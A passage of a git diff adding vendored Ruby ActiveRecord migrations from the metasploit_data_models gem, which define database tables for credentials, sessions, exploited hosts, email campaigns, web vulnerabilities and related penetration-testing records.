'ftp'; 21 + when /^smb/; 445 + when /^imap/; 143 + when 'telnet'; 23 + when 'pop3'; 110 + when 'http','domino','axis','wordpress','tomcat'; 80 + when 'tns'; 1521 + when 'snmp'; 161 + when 'mssql'; 1433 + when 'ssh'; 22 + when 'https'; 443 + when 'mysql'; 3306 + when 'db2'; 50000 + when 'postgres'; 5432 + else nil + end + if !default_port + skipped_notes << note + next + end + if candidate_services.size == 1 + svc_id = candidate_services.first.id + elsif candidate_services.empty? + Mdm::Service.new do |svc| + svc.host_id = note.host.id + svc.port = default_port + svc.proto = 'tcp' + svc.state = 'open' + svc.name = service_name.downcase + svc.save! + svc_id = svc.id + end + elsif candidate_services.size > 1 + svc_ports = candidate_services.map{|s| s.port} + if svc_ports.index(default_port) + svc_id = candidate_services[svc_ports.index(default_port)].id + else + svc_id = candidate_services.first.id + end + end + end + else + skipped_notes << note + next + end + if note.data[:hash] + ptype = 'smb_hash' + pass = note.data[:hash] + elsif note.data[:ssh_key] + ptype = 'ssh_key' + pass = note.data[:extra] + else + ptype = 'password' + pass = note.data[:pass] + end + # Format domains and databases into the usernames. + if note.ntype == "auth.smb_challenge" + domain = note.data[:extra].match(/DOMAIN=([^\s]+)/)[1] + if domain + user = [domain, note.data[:user]].join("/") + else + user = note.data[:user] + end + elsif note.ntype =~ /auth\.(postgres|db2)/ + if note.data[:database] + user = [note.data[:database], note.data[:user]].join("/") + else + user = note.data[:user] + end + else + user = note.data[:user] + end + # Not actually a credentials, convert to migrated notes + if service_name == 'smb' && note.data[:token] + skipped_notes << note + next + end + if service_name == 'tns' && note.data[:type] == "bruteforced_sid" + skipped_notes << note + next + end + # Special case for the bizarre reporting for aux/admin/oracle/oracle_login + if service_name == 'tns' && note.data[:type] == "bruteforced_account" + note.data[:data] =~ /([^\x2f]+)\x2f([^\s]+).*with sid (.*)/ + user = "#{$3}/#{$1}" + pass = $2 + end + new_creds << [svc_id, ptype, user, pass] + end + + say "Migrating #{new_creds.size} credentials." + new_creds.uniq.each do |note| + Mdm::Cred.new do |cred| + cred.service_id = note[0] + cred.user = note[2] + cred.pass = note[3] + cred.ptype = note[1] + cred.save! + end + end + + say "Migrating #{skipped_notes.size} notes." + skipped_notes.uniq.each do |note| + Mdm::Note.new do |new_note| + new_note.host_id = note.host_id + new_note.ntype = "migrated_auth" + new_note.data = note.data.merge(:migrated_auth_type => note.ntype) + new_note.save! + end + end + + say "Deleting migrated auth notes." + Mdm::Note.find(:all).each do |note| + next unless note.ntype[/^auth\.(.*)/] + note.delete + end + rescue + say "There was a problem migrating auth credentials. Skipping." + return true # Never fail! + end + end + + + def self.down + raise ActiveRecord::IrreversibleMigration + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb new file mode 100755 index 0000000000..b7897d3832 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb @@ -0,0 +1,16 @@ +class AddExploitedTable < ActiveRecord::Migration + def self.up + create_table :exploited_hosts do |t| + t.integer :host_id, :null => false + t.integer :service_id + t.string :session_uuid, :limit => 8 + t.string :name, :limit => 2048 + t.string :payload, :limit => 2048 + t.timestamps + end + end + def self.down + drop_table :exploited_hosts + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb new file mode 100755 index 0000000000..c136d4b9d7 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb @@ -0,0 +1,9 @@ +class AddOwnerToWorkspaces < ActiveRecord::Migration + def self.up + add_column :workspaces, :owner_id, :integer + end + + def self.down + remove_column :workspaces, :owner_id + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb new file mode 100755 index 0000000000..08b06d4c5f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb @@ -0,0 +1,18 @@ +class AddReportTemplates < ActiveRecord::Migration + + def self.up + create_table :report_templates do |t| + t.integer :workspace_id, :null => false, :default => 1 + t.string :created_by + t.string :path, :limit => 1024 + t.text :name + t.timestamps + end + end + + def self.down + drop_table :reports + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb new file mode 100755 index 0000000000..d73e18425d --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb @@ -0,0 +1,15 @@ +class RequireAdminFlag < ActiveRecord::Migration + + # Make the admin flag required. + def self.up + # update any existing records + Mdm::User.update_all({:admin => true}, {:admin => nil}) + + change_column :users, :admin, :boolean, :null => false, :default => true + end + + def self.down + change_column :users, :admin, :boolean, :default => true + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb new file mode 100755 index 0000000000..433bdcf65f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb @@ -0,0 +1,61 @@ + +class AddCampaignsAndTemplates < ActiveRecord::Migration + + def self.up + create_table :campaigns do |t| + t.integer :workspace_id, :null => false + t.string :name, :limit => 512 + # Serialized, stores SMTP/other protocol config options etc. + t.text :prefs + t.integer :status, :default => 0 + t.timestamp :started_at + t.timestamps + end + + create_table :email_templates do |t| + t.string :name, :limit => 512 + t.string :subject, :limit => 1024 + t.text :body + t.integer :parent_id + t.integer :campaign_id + end + create_table :attachments do |t| + t.string :name, :limit => 512 + t.binary :data + t.string :content_type, :limit => 512 + t.boolean :inline, :null => false, :default => true + t.boolean :zip, :null => false, :default => false + end + create_table :attachments_email_templates, :id => false do |t| + t.integer :attachment_id + t.integer :email_template_id + end + + create_table :email_addresses do |t| + t.integer :campaign_id, :null => false + t.string :first_name, :limit => 512 + t.string :last_name, :limit => 512 + t.string :address, :limit => 512 + t.boolean :sent, :null => false, :default => false + t.timestamp :clicked_at + end + + create_table :web_templates do |t| + t.string :name, :limit => 512 + t.string :title, :limit => 512 + t.string :body, :limit => 524288 + t.integer :campaign_id + end + end + + def self.down + drop_table :campaigns + drop_table :email_templates + drop_table :attachments + drop_table :attachments_email_templates + drop_table :email_addresses + drop_table :web_templates + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb new file mode 100755 index 0000000000..7b055b268f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb @@ -0,0 +1,8 @@ +class AddGenerateExeColumn < ActiveRecord::Migration + def self.up + add_column :email_templates, :generate_exe, :boolean, :null => false, :default => false + end + def self.down + remove_column :email_templates, :generate_exe + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb new file mode 100755 index 0000000000..70b84d0734 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb @@ -0,0 +1,11 @@ +class AddTemplatePrefs < ActiveRecord::Migration + def self.up + remove_column :email_templates, :generate_exe + add_column :email_templates, :prefs, :text + add_column :web_templates, :prefs, :text + end + def self.down + remove_column :email_templates, :prefs + remove_column :web_templates, :prefs + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb new file mode 100755 index 0000000000..e55bf286b5 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb @@ -0,0 +1,57 @@ +class AddWebTables < ActiveRecord::Migration + + def self.up + create_table :web_sites do |t| + t.integer :service_id, :null => false + t.timestamps + t.string :vhost, :limit => 2048 + t.text :comments + t.text :options + end + + create_table :web_pages do |t| + t.integer :web_site_id, :null => false + t.timestamps + t.text :path + t.text :query + t.integer :code, :null => false + t.text :cookie + t.text :auth + t.text :ctype + t.timestamp :mtime + t.text :location + t.text :body + t.text :headers + end + + create_table :web_forms do |t| + t.integer :web_site_id, :null => false + t.timestamps + t.text :path + t.string :method, :limit => 1024 + t.text :params + end + + create_table :web_vulns do |t| + t.integer :web_site_id, :null => false + t.timestamps + t.text :path + t.string :method, :limit => 1024 + t.text :params + t.text :pname + t.text :proof + t.integer :risk + t.string :name, :limit => 1024 + end + + end + + def self.down + drop_table :web_sites + drop_table :web_pages + drop_table :web_forms + drop_table :web_vulns + end +end + + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb new file mode 100755 index 0000000000..f22d0f2954 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb @@ -0,0 +1,10 @@ +class AddQuery < ActiveRecord::Migration + def self.up + add_column :web_forms, :query, :text + add_column :web_vulns, :query, :text + end + def self.down + remove_column :web_forms, :query + remove_column :web_vulns, :query + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb new file mode 100755 index 0000000000..34c1eb3fd9 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb @@ -0,0 +1,15 @@ +class AddVulnInfo < ActiveRecord::Migration + def self.up + add_column :web_vulns, :category, :text + add_column :web_vulns, :confidence, :text + add_column :web_vulns, :description, :text + add_column :web_vulns, :blame, :text + end + def self.down + remove_column :web_forms, :category + remove_column :web_vulns, :confidence + remove_column :web_vulns, :description + remove_column :web_vulns, :blame + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb new file mode 100755 index 0000000000..6281f91343 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb @@ -0,0 +1,10 @@ + +class AddClientsToCampaigns < ActiveRecord::Migration + def self.up + add_column :clients, :campaign_id, :integer + end + + def self.down + remove_column :clients, :campaign_id + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb new file mode 100755 index 0000000000..6baf770f29 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb @@ -0,0 +1,15 @@ + + +class AddCampaignAttachments < ActiveRecord::Migration + + def self.up + add_column :attachments, :campaign_id, :integer + end + + def self.down + remove_column :attachments, :campaign_id + end + +end + + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb new file mode 100755 index 0000000000..92eb12d474 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb @@ -0,0 +1,17 @@ +class AddImportedCreds < ActiveRecord::Migration + + def self.up + create_table :imported_creds do |t| + t.integer :workspace_id, :null => false, :default => 1 + t.string :user, :limit => 512 + t.string :pass, :limit => 512 + t.string :ptype, :limit => 16, :default => "password" + end + end + + def self.down + drop_table :imported_creds + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb new file mode 100755 index 0000000000..2056369ed7 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb @@ -0,0 +1,34 @@ +class FixWebTables < ActiveRecord::Migration + + def self.up + change_column :web_pages, :path, :text + change_column :web_pages, :query, :text + change_column :web_pages, :cookie, :text + change_column :web_pages, :auth, :text + change_column :web_pages, :ctype, :text + change_column :web_pages, :location, :text + change_column :web_pages, :path, :text + change_column :web_vulns, :path, :text + change_column :web_vulns, :pname, :text + + add_column :web_pages, :request, :text + add_column :web_vulns, :request, :text + end + + def self.down + change_column :web_pages, :path, :text + change_column :web_pages, :query, :text + change_column :web_pages, :cookie, :text + change_column :web_pages, :auth, :text + change_column :web_pages, :ctype, :text + change_column :web_pages, :location, :text + change_column :web_pages, :path, :text + change_column :web_vulns, :path, :text + change_column :web_vulns, :pname, :text + + remove_column :web_pages, :request + remove_column :web_vulns, :request + end +end + + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb new file mode 100755 index 0000000000..1a0bc1bc51 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb @@ -0,0 +1,12 @@ +class ExpandHostComment < ActiveRecord::Migration + + def self.up + change_column :hosts, :comments, :text + end + + def self.down + change_column :hosts, :comments, :string, :limit => 4096 + end +end + + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb new file mode 100755 index 0000000000..7365e14f9d --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb @@ -0,0 +1,9 @@ +class AddLimitToNetworkToWorkspaces < ActiveRecord::Migration + def self.up + add_column :workspaces, :limit_to_network, :boolean, :null => false, :default => false + end + + def self.down + remove_column :workspaces, :limit_to_network + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb new file mode 100755 index 0000000000..f41bc6a813 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb @@ -0,0 +1,9 @@ +class AddModuleUuidToTasks < ActiveRecord::Migration + def self.up + add_column :tasks, :module_uuid, :string, :limit => 8 + end + + def self.down + remove_column :tasks, :module_uuid + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb new file mode 100755 index 0000000000..d07c885c35 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb @@ -0,0 +1,28 @@ +class AddHostTags < ActiveRecord::Migration + + def self.up + + create_table :tags do |t| + t.integer :user_id + t.string :name, :limit => 1024 + t.text :desc + t.boolean :report_summary, :null => false, :default => false + t.boolean :report_detail, :null => false, :default => false + t.boolean :critical, :null => false, :default => false + t.timestamps + end + + create_table :hosts_tags, :id => false do |t| + t.integer :host_id + t.integer :tag_id + end + + end + + def self.down + drop_table :hosts_tags + drop_table :tags + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb new file mode 100755 index 0000000000..15ac8852bb --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb @@ -0,0 +1,110 @@ +class AddSessionTable < ActiveRecord::Migration + + class Event < ActiveRecord::Base + serialize :info + end + + class SessionEvent < ActiveRecord::Base + belongs_to :session + end + + class Session < ActiveRecord::Base + has_many :events, :class_name => 'AddSessionTable::SessionEvent' + serialize :datastore + end + + def self.up + + create_table :sessions do |t| + t.integer :host_id + + t.string :stype # session type: meterpreter, shell, etc + t.string :via_exploit # module name + t.string :via_payload # payload name + t.string :desc # session description + t.integer :port + t.string :platform # platform type of the remote system + t.string :routes + + t.text :datastore # module's datastore + + t.timestamp :opened_at, :null => false + t.timestamp :closed_at + + t.string :close_reason + end + + create_table :session_events do |t| + t.integer :session_id + + t.string :etype # event type: command, output, upload, download, filedelete + t.binary :command + t.binary :output + t.string :remote_path + t.string :local_path + + t.timestamp :created_at + end + + # + # Migrate session data from events table + # + + close_events = Event.find_all_by_name("session_close") + open_events = Event.find_all_by_name("session_open") + + command_events = Event.find_all_by_name("session_command") + output_events = Event.find_all_by_name("session_output") + upload_events = Event.find_all_by_name("session_upload") + download_events = Event.find_all_by_name("session_download") + + open_events.each do |o| + c = close_events.find { |e| e.info[:session_uuid] == o.info[:session_uuid] } + + s = Session.new( + :host_id => o.host_id, + :stype => o.info[:session_type], + :via_exploit => o.info[:via_exploit], + :via_payload => o.info[:via_payload], + :datastore => o.info[:datastore], + :opened_at => o.created_at + ) + + if c + s.closed_at = c.created_at + s.desc = c.info[:session_info] + else + # couldn't find the corresponding close event + s.closed_at = s.opened_at + s.desc = "?" + end + + uuid = o.info[:session_uuid] + + command_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| + s.events.build(:created_at => e.created_at, :etype => "command", :command => e.info[:command] ) + end + + output_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| + s.events.build(:created_at => e.created_at, :etype => "output", :output => e.info[:output] ) + end + + upload_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| + s.events.build(:created_at => e.created_at, :etype => "upload", :local_path => e.info[:local_path], :remote_path => e.info[:remote_path] ) + end + + download_events.select { |e| e.info[:session_uuid] == uuid }.each do |e| + s.events.build(:created_at => e.created_at, :etype => "download", :local_path => e.info[:local_path], :remote_path => e.info[:remote_path] ) + end + + s.events.sort_by(&:created_at) + + s.save! + end + end + + def self.down + drop_table :sessions + drop_table :session_events + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb new file mode 100755 index 0000000000..7c0e57c505 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb @@ -0,0 +1,11 @@ +class AddLocalIdToSessionTable < ActiveRecord::Migration + + def self.up + add_column :sessions, :local_id, :integer + end + + def self.down + remove_column :sessions, :local_id + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb new file mode 100755 index 0000000000..1eb104f9bf --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb @@ -0,0 +1,18 @@ +class AddRoutesTable < ActiveRecord::Migration + + def self.up + create_table :routes do |t| + t.integer :session_id + t.string :subnet + t.string :netmask + end + + remove_column :sessions, :routes + end + + def self.down + drop_table :routes + + add_column :sessions, :routes, :string + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb new file mode 100755 index 0000000000..4fa3428ad1 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb @@ -0,0 +1,72 @@ +class ConvertBinary < ActiveRecord::Migration + + + class WebPage < ActiveRecord::Base + serialize :headers + end + + class WebVuln < ActiveRecord::Base + serialize :params + end + + def bfilter(str) + str = str.to_s + str.encoding = 'binary' if str.respond_to?('encoding=') + str.gsub(/[\x00\x7f-\xff]/, '') + end + + def self.up + rename_column :web_pages, :body, :body_text + rename_column :web_pages, :request, :request_text + rename_column :web_vulns, :request, :request_text + rename_column :web_vulns, :proof, :proof_text + + add_column :web_pages, :body, :binary + add_column :web_pages, :request, :binary + add_column :web_vulns, :request, :binary + add_column :web_vulns, :proof, :binary + + WebPage.find(:all).each { |r| r.body = r.body_text; r.save! } + WebPage.find(:all).each { |r| r.request = r.request_text; r.save! } + WebVuln.find(:all).each { |r| r.proof = r.proof_text; r.save! } + WebVuln.find(:all).each { |r| r.request = r.request_text; r.save! } + + remove_column :web_pages, :body_text + remove_column :web_pages, :request_text + remove_column :web_vulns, :request_text + remove_column :web_vulns, :proof_text + + WebPage.connection.schema_cache.clear! + WebPage.reset_column_information + WebVuln.connection.schema_cache.clear! + WebVuln.reset_column_information + end + + def self.down + + rename_column :web_pages, :body, :body_binary + rename_column :web_pages, :request, :request_binary + rename_column :web_vulns, :request, :request_binary + rename_column :web_vulns, :proof, :proof_binary + + add_column :web_pages, :body, :text + add_column :web_pages, :request, :text + add_column :web_vulns, :request, :text + add_column :web_vulns, :proof, :text + + WebPage.find(:all).each { |r| r.body = bfilter(r.body_binary); r.save! } + WebPage.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! } + WebVuln.find(:all).each { |r| r.proof = bfilter(r.proof_binary); r.save! } + WebVuln.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! } + + remove_column :web_pages, :body_binary + remove_column :web_pages, :request_binary + remove_column :web_vulns, :request_binary + remove_column :web_vulns, :proof_binary + + WebPage.connection.schema_cache.clear! + WebPage.reset_column_information + WebVuln.connection.schema_cache.clear! + WebVuln.reset_column_information + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb new file mode 100755 index 0000000000..48380af6ae --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb @@ -0,0 +1,8 @@ +class AddLastSeenToSessions < ActiveRecord::Migration + def self.up + add_column :sessions, :last_seen, :timestamp + end + def self.down + remove_column :sessions, :last_seen + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb new file mode 100755 index 0000000000..7c55105fe8 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb @@ -0,0 +1,31 @@ +class TrackSuccessfulExploits < ActiveRecord::Migration + + + class ExploitedHost < ActiveRecord::Base + end + + class Vuln < ActiveRecord::Base + end + + def self.up + add_column :vulns, :exploited_at, :timestamp + + # Migrate existing exploited_hosts entries + + ExploitedHost.find(:all).select {|x| x.name}.each do |exploited_host| + next unless(exploited_host.name =~ /^(exploit|auxiliary)\//) + vulns = Vuln.find_all_by_name_and_host_id(exploited_host.name, exploited_host.host_id) + next if vulns.empty? + vulns.each do |vuln| + vuln.exploited_at = exploited_host.updated_at + vuln.save + end + end + + end + + def self.down + remove_column :vulns, :exploited_at + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb new file mode 100755 index 0000000000..e1b8955b7f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb @@ -0,0 +1,26 @@ +class RenameAndPruneNessusVulns < ActiveRecord::Migration + + class Vuln < ActiveRecord::Base + end + + # No table changes, just vuln renaming to drop the NSS id + # from those vulns that have it and a descriptive name. + def self.up + Vuln.find(:all).each do |v| + if v.name =~ /^NSS-0?\s*$/ + v.delete + next + end + next unless(v.name =~ /^NSS-[0-9]+\s(.+)/) + new_name = $1 + next if(new_name.nil? || new_name.strip.empty?) + v.name = new_name + v.save! + end + end + + def self.down + say "Cannot un-rename and un-prune NSS vulns for migration 20110517160800." + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb new file mode 100755 index 0000000000..5af2d46704 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb @@ -0,0 +1,11 @@ +class AddTaskIdToReportsTable < ActiveRecord::Migration + + def self.up + add_column :reports, :task_id, :integer + end + + def self.down + remove_column :reports, :task_id + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb new file mode 100755 index 0000000000..13e6ecedd0 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb @@ -0,0 +1,12 @@ +class AddApiKeysTable < ActiveRecord::Migration + def self.up + create_table :api_keys do |t| + t.text :token + t.timestamps + end + end + def self.down + drop_table :api_keys + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb new file mode 100755 index 0000000000..bfb8ef6085 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb @@ -0,0 +1,16 @@ +class AddMacrosTable < ActiveRecord::Migration + def self.up + create_table :macros do |t| + t.timestamps + t.text :owner + t.text :name + t.text :description + t.binary :actions + t.binary :prefs + end + end + def self.down + drop_table :macros + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb new file mode 100755 index 0000000000..ee9ee21070 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb @@ -0,0 +1,12 @@ +class AddSettingsToTasksTable < ActiveRecord::Migration + + def self.up + add_column :tasks, :settings, :binary + end + + def self.down + remove_column :tasks, :settings + end + +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb new file mode 100755 index 0000000000..c541be2131 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb @@ -0,0 +1,19 @@ +class AddListenersTable < ActiveRecord::Migration + def self.up + create_table :listeners do |t| + 